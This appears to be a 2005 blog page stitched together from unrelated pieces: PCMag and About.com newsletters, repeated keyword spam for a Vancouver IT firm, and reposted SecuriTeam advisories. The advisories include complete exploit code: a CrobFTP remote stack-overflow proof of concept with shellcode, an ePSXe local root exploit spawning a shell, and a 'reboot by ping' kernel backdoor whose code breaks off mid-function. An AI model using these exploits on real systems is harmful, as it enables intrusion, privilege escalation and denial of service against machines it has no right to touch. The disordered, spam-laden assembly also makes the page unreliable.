Search This Blog

Monday, June 06, 2005

Today's Tip: Degunking Your PC


PCMag.com
      HOME    |    REVIEWS    |    DOWNLOADS    |    SOLUTIONS    |    NEWS    |    OPINIONS    |    SHOP    |    DISCUSSIONS    |    JOB SEARCH
   June 6, 2005

Sponsored by Xerox Office Printing Business

A winner in the printing triathlon, brilliant color that won't quit. Enter to win a 50" HDTV or a Xerox Phaser® 6250 Color Laser Printer. Visit xerox.com to enter.


Category: Software

Degunking Your PC

Perhaps you've wondered, "Is it just me, or is my PC getting slower?" Well, your PC is getting slower, as what we affectionately call gunk collects in it. Gunk is data, files, and programs you don't need, and debris from applications you've uninstalled. It's the entropy of hard drive fragmentation, and chaos in the Windows Registry from abandoned or corrupted keys. It's spyware and adware, which beyond compromising your privacy can slow your PC and make it unstable. All this is reversible, though. Read today's tip to learn what to do.

For the solution, go here.

For more Solutions, go here.

For more useful tips, check   the Tips page (and scroll down to search Tips by category).

E-mail questions and tips to pcmsolutions@ziffdavis.com.




The PCMag.com Bookstore

PC Magazine Windows XP Speed Solutions
Does everything seem to be moving very, very slowly? Then it's time to call in PC Magazine's favorite system doctor. This indispensable book show you exactly how to turn that snail into a cheetah by unloading the junk that Windows XP had collected, turbocharing your system for faster response, cleaning up the Registry, and using all the safeguards provided in Service Pack 2.

PC Magazine Windows XP Solutions
Ever wish they'd consulted you before they designed Windows XP? Sure, it's a great system, but there's this one feature that makes you crazy. Or that annoying problem that keeps occurring. Well, you can rely on Neil Randall and your friends at PC Magazine to correct that oversight. Here's the complete compendium of solutions to the things that bug you, threaten your security, slow you down, or other-wise prevent Windows XP from achieving perfection.

More Books





 Free White Paper  |   Brought to you by ZANTAZ
< Manage the Risk of Your Digital Data with ZANTAZ.

ZANTAZ' compliance, email and file management, as well as litigation support solutions are the most comprehensive suite of information retention and discovery management solutions (IRDM) in the world. The world's top securities firms, law firms and enterprises trust ZANTAZ with their digital data. You should, too.

Download this Free White Paper now!



 Product Solutions from Ziff Davis Web Buyer's Guide      Sponsored Listings
Streaming Media Product: Akamai Streaming Service
Deliver a superior user experience, reach worldwide audiences, and launch new communication initiatives: With Akamai Streaming, you can take advantage of a high-quality, extremely reliable streaming service to flawlessly distribute live and on-demand media content to your Web visitors.

Get free product information




eNewsletter Information
You are subscribed to PC Magazine Tip of the Day with the email address security.world@gmail.com. Click here to unsubscribe from this newsletter.

To subscribe to other e-mail newsletters from Ziff Davis, change your delivery format from HTML to text, or change your email address, click here.



Copyright © 2005 Ziff Davis Media, Inc. All Rights Reserved.
Ziff Davis Media Inc., 28 East 28th Street, New York, NY 10016


ALSO OF INTEREST
Community Debates Microsoft's Agenda
One Powerful Robot Kit
ExtremeTech's Best of Computex
Apple-Intel Chip Deal Outcry Keeps Growing

FREE ONLINE NEWSLETTERS

ExtremeTech Build It
Ziff Davis Techsaver
Inside PCMag.com
What's New Now
The Channel Insider
Publish World Update
HTML Text
Email address:

SPECIAL MAGAZINE OFFER

DELL UPDATES

Sign up for Dell e-mail updates today!
Dell Small Business invites you to receive our exclusive e-mail updates. Start saving right away with your new member exclusive deal - 10% off your next purchase. This amazing discount gives you a glimpse of the savings to come as a Dell subscriber. Click here to Subscribe!


PCMAG.COM SHAREWARE LIBRARY

Super-Useful Apps You Can Try Free Now!

  • GhostSurf Platinum 2005
  • WinTasks 5 Professional
  • WinBackup
  • SpeedUpMyPC 2.0
  • Ringtone Converter/Composer 5.2
  • Coding Workshop Polyphonic Wizard 3.7
  • Pocket DVD Wizard for Pocket PC 2.4

    More Shareware >>

  • ZIFF DAVIS SPOTLIGHT
    Featured Site:
    HP Smart Business Center: Smart Technology Solutions for Small Business

    EVENTS


    eBay Live! 2005 - June 23rd- 25th, The San Jose Convention Center, San Jose, CA - Booth #1432 Adobe® and PC Magazine present the "Ultimate Home Photo Studio" at eBay Live!, Booth #1432. The Photo Studio will provide attendees with a hands-on environment, where they can ask questions, solicit feedback and talk face-to-face with digital photography experts. Click here for more information about the booth and seminars PC Magazine is involved with at eBay Live!


    eCare Network Solutions provides various security related services in greater Vancouver area.


    For more information about security audits, please see Vancouver Security Audits.

    To learn more about Security threat assessment please visit Vancouver Security Threat Assessment resources.

    To learn more about how to design a secure infrastructure please go to Vancouver Secure Infrastructre Design.

    To get help in setting up firewalls and virtual private networks, please see Vancouver Firewall Setup How To

    and Vancouver VPN Setup How To

    Vancouver Security Threat Assessment, Penetration Testing, Intrusion Detection, Security Breach, Computer Network Security, Cisco, Firewall

    vancouver computer consulting, vancouver network consulting, vancouver computer support, network design, internet consulting, it consulting, network security, linux consulting, computer security, computer technical support, vancouver computer consulting, vancouver network consulting, vancouver networking, cisco consulting, network setup, network management, cisco network design, web site design, website development, Macromedia Flash development, and custom solutions vancouver.


    511-1540 Davie Street
    Vancouver, BC
    Postal Code: V6G 1V7
    Canada


    eCare Network Solutions Vancouver provides quality technical support, IT outsourcing, networking, security, asset management, procurement, firewall & vpn solutions, and website design & development services in Vancouver, British Columbia.


    In cities such as Vancouver, Burnaby, Richmond, Abbotsford, Coquitlam, Delta, Langley, and Surrey.

    Vancouver Network Security Audit, Firewall, VPN, Risk Assessment, Network Vulnerability Assessments

    eCare Network Solutions offers these computer and networking support services in Vancouver, British Columbia, Canada and abroad: In the Greater Vancouver area we offer vancouver computer support, small business networking, vancouver security, canada network security, and web site design services.��
    eCare Network Solutions develops custom computer solutions in Vancouver,including web site design, computer networking,�computer support, and computer training�for small and mid-size business in the Greater Vancouver area.



    computer consulting, network consulting, canada network consulting, canada computer consulting, network design, internet consulting, it consulting, network security, linux consulting, computer security, computer technical support, canada computer consulting, canada network consulting, canada networking, Firewall setup, dsl, cable, broadband, wireless network,
    cisco consulting, network management, cisco network design, web site design, flash, development in Vancouver. Phone us at778.895.6228


    eCare Network Solutions Home Vancouver IT Computer Support Vancouver Networking Design Setup Maintenance Security Firewall Solutions Web Design Flash Development eCare Vancouver Site Map


    eCare Network Solutions Vancouver provides quality technical support, IT outsourcing, networking, security, asset management, procurement, firewall & vpn solutions, and website design & development services in Vancouver, British Columbia.


    In cities such as Vancouver, Burnaby, Richmond, Abbotsford, Coquitlam, Delta, Langley, and Surrey.


    Vancouver Network Security, Security Audit, Firewall, VPN, Wireless, Cisco

    Vancouver computer network security web site design and support by eCare Network Solutions


    Computer support, on-site support, network setup and maintenance, security, and web site design in the Vancouver area

    vancouver computer consultin


    eCare Network Solutions Vancouver provides quality technical support, IT outsourcing, networking, security, asset management, procurement, firewall & vpn solutions, and website design & development services in Vancouver, British Columbia.


    In cities such as Vancouver, Burnaby, Richmond, Abbotsford, Coquitlam, Delta, Langley, and Surrey.


    [UNIX] GIPTables Firewall Race Condition

    GIPTables Firewall Race Condition
    ------------------------------------------------------------------------



    SUMMARY

    GIPTables Firewall is a free set of shell
    scripts that helps you generate iptables rules for Linux 2.4.x and newer
    kernels. It is very easy to configure and at present, designed to run on
    hosts with one or two network cards. It doesn't require you to install any
    additional components to make it work with your GNU/Linux system. All you
    need to set-up a very secure firewall for your GNU/Linux machines is
    iptables and GIPTables Firewall."

    GIPTables Firewall does not use a random naming convention for its
    temporary file creation, this allows attackers to cause a race condition
    vulnerability.

    DETAILS


    Vulnerable Systems:
    * GIPTables Firewall version 1.1 and prior

    The vulnerability is caused due to temporary file being created
    insecurely. This can be exploited via symbolic link to create and
    overwrite arbitrary files with the privileges of the user running the
    affected script.

    It is also possible to cause a denial of service by manipulating the IP
    addresses present inside the temporary file

    The exploitation require that the root configure or reconfigure his
    firewall rules.

    Code Snips:
    # Network Ghouls

    [ "$NETWORK_GHOULS" == "yes" ] && [ "$DEBUG" = "on" ] && echo -e "\n# Network Ghouls"

    if [ "$NETWORK_GHOULS" == "yes" ] && [ -f
    "$GIPTABLES_BLOCKED_FILE" ]; then

    deny_file="$GIPTABLES_BLOCKED_FILE"
    temp_file="/tmp/temp.ip.addresses"
    cat $deny_file | sed -n -e "s/^[ ]*\([0-9.]*\).*$/\1/p" | awk '
    $1 ' > $temp_file
    while read ip_addr
    do

    drop_ipaddr interface0_in source $ip_addr && drop_ipaddr interface0_out destination $ip_addr

    [ -n "$INTERFACE1" ] && drop_ipaddr interface1_in source $ip_addr && drop_ipaddr interface1_out destination $ip_addr

    [ -n "$INTERFACE1" ] && drop_ipaddr network1_in source $ip_addr && drop_ipaddr network1_out destination $ip_addr

    done < $temp_file
    rm -f $temp_file > /dev/null 2>&1
    unset temp_file
    unset deny_file

    fi

    [TOOL] Multithreaded Broadcast Scanner for Windows

    Multithreaded Broadcast Scanner for Windows
    ------------------------------------------------------------------------


    SUMMARY

    DETAILS

    Ibis is useful for discovering any IP Address that gives you back one or
    more ping reply and, it can be used to get a list of smurf amplifiers
    attack. The tool can also be used to discover which addresses respond to
    ICMP ECHO request and with how many replies.

    Main Features:
    * You can choose how fast must be your scan (setting a delay parameter)
    * You can choose to save only those IP with a certain number of DUPs
    * You can save the output in 3 different ways
    * You can run it silently or displaying every ping request/reply event
    * You can scan the whole Internet or a specific space of addresses
    * You can always choose to scan IP addresses ending with 0 or 255 by
    setting the -big parameter




    eCare Network Solutions provides various security related services in greater Vancouver area.


    For more information about security audits, please see Vancouver Security Audits.

    To learn more about Security threat assessment please visit Vancouver Security Threat Assessment resources.

    To learn more about how to design a secure infrastructure please go to Vancouver Secure Infrastructre Design.

    To get help in setting up firewalls and virtual private networks, please see Vancouver Firewall Setup How To

    and Vancouver VPN Setup How To

    [TOOL] Rbping - Reboot By Ping

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

    Rbping - Reboot By Ping
    ------------------------------------------------------------------------

    SUMMARY

    DETAILS

    rbping is a kernel module that allows an administrator to add a backdoor
    that will restart the system whenever it receives a special ping requests.

    Tool:
    /*
    name rbping.c
    desc: Reboot By Ping
    type: Linux kernel module
    author: Edisan <edisan@ghc.ru>
    usage: ping -p "deadbaba" ip
    tested: linux-2.4.26

    GPL rulez
    GHC rulez
    RST rulez
    */

    #define __KERNEL_SYSCALLS__

    #define MODULE
    #define __KERNEL__

    #include <linux/version.h>
    #include <linux/module.h>
    #include <linux/kernel.h>

    #include <linux/unistd.h>
    #include <sys/syscall.h>

    #include <net/icmp.h>

    #define LKM_VERSION "v0.1"
    #define LKM_NAME "rbping"

    #define MAGIC_PATTERN 0xbabaadde

    int new_icmp_rcv(struct sk_buff *);
    struct inet_protocol * original_icmp_protocol;

    struct inet_protocol new_icmp_protocol =
    {
    &new_icmp_rcv,
    NULL,
    NULL,
    IPPROTO_ICMP,
    0,
    NULL,
    "ICMP"
    };

    int new_icmp_rcv(struct sk_buff *skb)
    {
    char *data = skb->data+16;

    if (*(u_long *)data == MAGIC_PATTERN)
    {
    extern void *sys_call_table[];

    int (*our_kill)(int, int) = sys_call_table[SYS_kill];

    printk("<1>%s: reboot requested.\n", LKM_NAME);

    our_kill(1, 2);
    }
    #ifdef DEBUG
    else
    printk("<1>%s: icmp pattern rcv: %x\n", LKM_NAME, *(u_long *)data);

    [EXPL] CrobFTP Remote Stack Overflow (Long Directories, Exploit)

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

    CrobFTP Remote Stack Overflow (Long Directories, Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    Crob FTP Server is "a powerful
    and easy-to-use FTP server".

    CrobFTP is vulnerable to stack overflow when it tries to handle long
    directories names, the following exploit will cause the execution of the
    calc.exe program on a vulnerable system.

    DETAILS

    Vulnerable Systems:
    * Crob FTP Server version 3.6.1 (other versions suspected)

    /*
    * CrobFTP remote stack overflow PoC
    * ---------------------------------
    * Tested on Crob FTP Server 3.6.1, Windows XP
    *
    * Coded by Leon Juranic <ljuranic@lss.hr>
    * LSS Security / http://security.lss.hr
    *
    */

    #include <stdio.h>
    #include <windows.h>
    #include <time.h>

    #pragma comment (lib,"ws2_32")

    char *fzz_recv (int sock)
    {
    fd_set fds;
    struct timeval tv;
    static char buf[10000];
    char *ptr=buf;
    int n;
    tv.tv_sec = 5;
    tv.tv_usec = 0;

    FD_ZERO(&fds);
    FD_SET(sock,&fds);
    if (select(NULL,&fds,NULL,NULL,&tv) != 0) {
    if (FD_ISSET (sock,&fds)) n=recv (sock,ptr,sizeof(buf),0);
    buf[n-1] = '\0';
    printf ("RECV: %s\n",buf);
    return buf;
    }
    else {
    return NULL;
    }

    }

    int login (int sock, char *user, char *pass)
    {
    char buf[1024], *bla;
    bla=fzz_recv(sock);
    printf ("recv: %s\n",bla);
    sprintf (buf,"USER %s\r\n",user);
    send (sock,buf,strlen(buf),0);
    bla=fzz_recv(sock);
    printf ("recv: %s\n",bla);
    sprintf (buf,"PASS %s\r\n",pass);
    send (sock,buf,strlen(buf),0);
    bla=fzz_recv(sock);
    printf ("recv: %s\n",bla);
    if (strcmp("230",bla) != NULL)
    return 0;
    else return -1;
    return 0;
    }

    void lame_sploit (char *pack, char *user, char *pass)
    {
    WORD wVersionRequested;
    WSADATA wsaData;
    int sock, err,x;
    struct sockaddr_in sin;
    char buf[2000],tmp[1000];

    char *shell= // 5 min. XP SP1 shellcode
    "\x33\xc0" // xor eax,eax
    "\x50" // push eax (\0)
    "\x68\x2e\x65\x78\x65" // push '.exe'
    "\x68\x63\x61\x6c\x63" // push 'calc'
    "\x54" // push esp
    "\xba\x44\x80\xc2\x77" // mov edx, 77c28044
    "\xff\xd2"; // call edx
    (system)

    wVersionRequested = MAKEWORD( 2, 2 );
    err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 ) {
    printf ("ERROR: Sorry, cannot create socket!!!\n");
    ExitProcess(-1);
    }

    sock=socket(AF_INET,SOCK_STREAM,0);

    sin.sin_family=AF_INET;
    sin.sin_addr.s_addr = inet_addr(pack);
    sin.sin_port = htons(21);

    if (connect(sock,(struct sockaddr*)&sin, sizeof(struct sockaddr))
    == -1) {
    printf ("CONNECT :(((\n");
    ExitProcess(-1);
    }

    if (login(sock,user,pass) == -1)
    {
    printf ("ERROR: Cannot login to FTP server, sorry!!!\n");
    exit(-1);
    }

    memset(tmp,0,sizeof(tmp));
    memset (tmp,0x90,180);

    memcpy (&tmp[80],shell,strlen(shell));
    *(long*)&tmp[158] = 0x77da52b8; // EIP -> ret into 'jmp esp'
    *(long*)&tmp[166] = 0x74ec8390; // sub esp,0x74
    *(long*)&tmp[170] = 0x9090e4ff; // jmp esp

    _snprintf (buf,sizeof(buf),"STOR %s\r\n", tmp);

    printf ("DEBUG: %.30s %d\n",buf,strlen(buf));
    send (sock,buf,strlen(buf),0);
    printf ("%s\n",fzz_recv(sock));

    strcpy(buf,"RMD ");
    for (x=0;x<276;x++)
    strcat (buf,".../");
    strcat(buf,"\r\n");

    printf ("Sending exploit strings\n");
    send (sock,buf,strlen(buf),0);
    printf ("recv: %s\n",fzz_recv(sock));

    }

    main (int argc, char **argv)
    {
    printf ("CrobFTP Stack overflow PoC \n"
    "Coded by Leon Juranic <ljuranic@lss.hr>\n"
    "LSS Security / http://security.lss.hr/\n");

    if (argc < 4 ) {
    printf ("\nusage: %s <target_IP> <user>
    <pass>\n",argv[0]);
    exit(-1);
    }
    lame_sploit(argv[1],argv[2],argv[3]);

    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:ljuranic@lss.hr> Leon
    Juranic.
    The original article can be found at:
    <http://security.lss.hr/index.php?page=exp>
    http://security.lss.hr/index.php?page=exp

    ========================================

    [EXPL] ePSXe Local Stack Overflow (Exploit)

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

    ePSXe Local Stack Overflow (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    <http://www.epsxe.com/ > ePSXe is "a PSX(Sony PlayStation) emulator for
    Linux". The following exploit code will use a locally exploitable stack
    overflow in ePSXe to gain root privileges on systems that have the setuid
    bit set on the ePSXe program.

    DETAILS

    Vulnerable Systems:
    * ePSXe emulator version 1.6.0 and prior

    Exploit:
    /* epsxe-e.c
    ePSXe v1.* local exploit
    By: Qnix
    e-mail: q-nix[at]hotmail[dot]com
    ePSXe-website: www.epsxe.com

    EXP-Sample:

    root@Qnix:~/epsxe# gcc -o epsxe-e epsxe-e.c
    root@Qnix:~/epsxe# ./epsxe-e

    *************************************
    ePSXe v1.* local exploit
    by
    Qnix | Q-nix[at]hotmail[dot]com
    *************************************

    [~] Stack pointer (ESP) : 0xbffff568
    [~] Offset from ESP : 0x0
    [~] Desired Return Addr : 0xbffff568

    * Running ePSXe emulator version 1.6.0.
    * Memory handlers init.
    sh-2.05b# id
    uid=0(root) gid=0(root)
    groups=0(root), 1(bin), 2(daemon), 3(sys), 4(adm), 6(disk), 10(wheel),
    11(floppy)
    */

    #include <stdlib.h>

    char shellcode[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
    "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
    "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
    "\x68";

    unsigned long sp(void)
    { __asm__("movl %esp, %eax");}

    int main(int argc, char *argv[])
    {
    int i, offset;
    long esp, ret, *addr_ptr;
    char *buffer, *ptr;

    offset = 0;
    esp = sp();
    ret = esp - offset;

    printf("\n ************************************* \n");
    printf(" ePSXe v1.* local exploit \n");
    printf(" by \n");
    printf(" Qnix | Q-nix[at]hotmail[dot]com ");
    printf("\n ************************************* \n\n");
    printf("[~] Stack pointer (ESP) : 0x%x\n", esp);
    printf("[~] Offset from ESP : 0x%x\n", offset);
    printf("[~] Desired Return Addr : 0x%x\n\n", ret);

    buffer = malloc(600);

    ptr = buffer;
    addr_ptr = (long *) ptr;
    for(i=0; i < 600; i+=4)
    { *(addr_ptr++) = ret; }

    for(i=0; i < 200; i++)
    { buffer[i] = '\x90'; }

    ptr = buffer + 200;
    for(i=0; i < strlen(shellcode); i++)
    { *(ptr++) = shellcode[i]; }

    buffer[600-1] = 0;

    execl("./epsxe", "epsxe", "-nogui", buffer, 0);

    free(buffer);

    return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:q-nix[at]hotmail[dot]com>
    Qnix.

    ========================================


    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    WiFi Security 101: WiFi Security 101: Lesson 1

    WiFi Security 101: WiFi Security 101: Lesson 1


    from Tony Bradley, CISSP, your Editor and Guide
    Before we begin to discuss the aspects of securing your wireless
    network, I wanted to provide some foundation about the basic equipment
    and technology involved with wireless networking. Once you have some
    understanding of the fundamental components, we will move on to talk
    about how you can secure and protect your wireless network.




    Basics of Wireless Networks
    What is a wireless network and how does it work? What are the
    essential components that make up a wireless network?

    Wireless Network Hardware
    A brief article describing the different wireless networking hardware
    components and explaining what is necessary to create a wireless
    network.

    Wireless Network Protocols
    Wireless network protocols are constantly evolving. There are a number
    of new, faster, more secure protocols on the horizon. This short
    article explains the wireless network protocols typically used for
    standard home and small office wireless networks.

    About.com Guide for Internet / Network Security

    Windows 2003 Security

    Title: How Windows Server 2003’s Software Restriction Policies Improve Security
    Summary: Allowing any unauthorized software to run on company computers, especially those connected to the network, poses many dangers. Even if the program isn’t infested with malicious code, incompatibility problems can result in operating system crashes, or interfere with the operation of other programs, and complicate tech support and troubleshooting – not to mention licensing issues. For this reason, Microsoft includes a new feature with Windows Server 2003 and Windows XP: software restriction policies.

    Title: Patch management with GFI LANguard N.S.S. & Microsoft SUS
    Summary: Patch management is an essential network administration task and consists of scanning machines on the network for missing patches and deploying those patches as soon as they become available. This white paper provides an overview of how to use GFI LANguard Network Security Scanner (N.S.S.) and Microsoft Software Update Services (SUS) to keep your network updated.

    Title: Violating Database - Enforced Security Mechanisms
    Summary: This paper discusses the feasibility of violating the access control, authentication and audit mechanisms of a running process in the Windows server operating systems. Specifically, it discusses the feasibility of totally disabling application - enforced access control in a running service, taking SQL Server 2000 as a sizeable and meaningful example. Topics relating to "runtime patching" exploits are discussed.

    Title: Wireless Security Primer (Part II)
    Summary: In this article, we will discuss what every Wireless Administrator should do (or think about) to keep their Wireless LANs (WLANs) safe and secure. Every time you deploy a Wireless network, you should always ask yourself the following questions outlined within this article. Much has been done to secure wireless transmissions, but there are still items missed that can help your security posture, that many administrators are still not doing and are very important.

    Title: Security Scanner & Patch Management Tools Review
    Summary: Security scanning & patch management is essential to prevent vulnerabilities on your network. Patch management in particular has become a hot topic and I review some of the leading security scanning & patch management tools available today. This review gives you a ‘birds eye’ view of each tool, to give you an idea how they work and what they they’re meant for. I also compare tools so you can decide which would be best for your network.

    Title: Defining a Security Policy
    Summary: Security Polices are a necessary evil in today’s enterprise networks. Without a Security Policy, you leave yourself open and vulnerable to a lot of political attacks. In this article, we will begin to look at all the measures you will need to deploy to successfully define a security policy.

    Title: Wireless Security Primer (Part II)
    Summary: In this article, we will discuss what every Wireless Administrator should do (or think about) to keep their Wireless LANs (WLANs) safe and secure. Every time you deploy a Wireless network, you should always ask yourself the following questions outlined within this article. Much has been done to secure wireless transmissions, but there are still items missed that can help your security posture, that many administrators are still not doing and are very important.

    Title: Windows 2000 allows unauthorized users to get administrator rights on computer
    Summary: This article describes a security flaw which allows unauthorized users to get administrator rights on computers that are running Microsoft Windows 2000 operating system.

    Title: Intrusion Detection Systems (IDS) Part I - (network intrusions; attack symptoms; IDS tasks; and IDS architecture)
    Summary: Due to a growing number of intrusions and since the Internet and local networks have become so ubiquitous, organizations increasingly implementing various systems that monitor IT security breaches. Intrusion Detection Systems (IDS) are those that have recently gained a considerable amount of interest. This is an introductory article to this topic. It gives an overview of several types of detectable attacks, symptoms that help in intrusion detection, describes IDS tasks, different architectures and concepts in this field.


    Windows Security

    Sunday, June 05, 2005

    Introduction to Security Tools: Introduction to Firewalls

    About U. Free Email Courses
    Introduction to Security Tools: Introduction to Firewalls
    Lesson Quiz Free Tools
    Tony Bradley, CISSP

    from Tony Bradley, CISSP, your Editor and Guide
    Firewalls are one of the more well-known security technologies. Most people are familiar with the word and maybe even the concept even if they don't understand completely. This lesson will give you some basic background on what a firewall is and how it works.

    eCare Network Solutions provide security audit, security threat assessment, secure infrastructre design, firewall selection and setup, and security management solutions in vancouver area.

    Lesson

    Introduction to Firewalls

    A brief explanation of what a firewall is and how they work.


    Types of Firewalls

    A discussion of the different types of firewalls and how they function differently to help keep unauthorized traffic out of your network or computer.


    Pros and Cons

    A discussion of some of the benefits and drawbacks of the different types of firewalls.

    Quiz

    Introduction to Firewalls Quiz

    A short quiz to test the information you learned from Introduction to Firewalls.

    Free Tools

    Free Personal Firewall Software

    This section provides links to various personal firewall software that you can use completely free of charge.






    Learn Something New Every Day
    Enroll at About U for More Online Learning
    About U is our collection of free online courses on About.com. Each online course is sent to you via email on a daily or weekly basis and will help you learn new skills, solve common problems, find shortcuts and quick tricks to simplify your busy life, or just learn more about your world.

    Search About

    Missing Lesson: http://netsecurity.about.com/c/ec/14lost.htm

    Cancel Subscription: You are receiving this email because you subscribed to the About Introduction to Firewalls as security.world@gmail.com. If you no longer wish to receive emails from us, please click here:
    http://about.com/nl/usec.htm?nl=netsecurity_14&e=security.world@gmail.com

    About respects your privacy. Our Privacy Policy.

    Our Contact Information.
    249 West 17th Street
    New York, NY, 10011

    © 2003 About, Inc.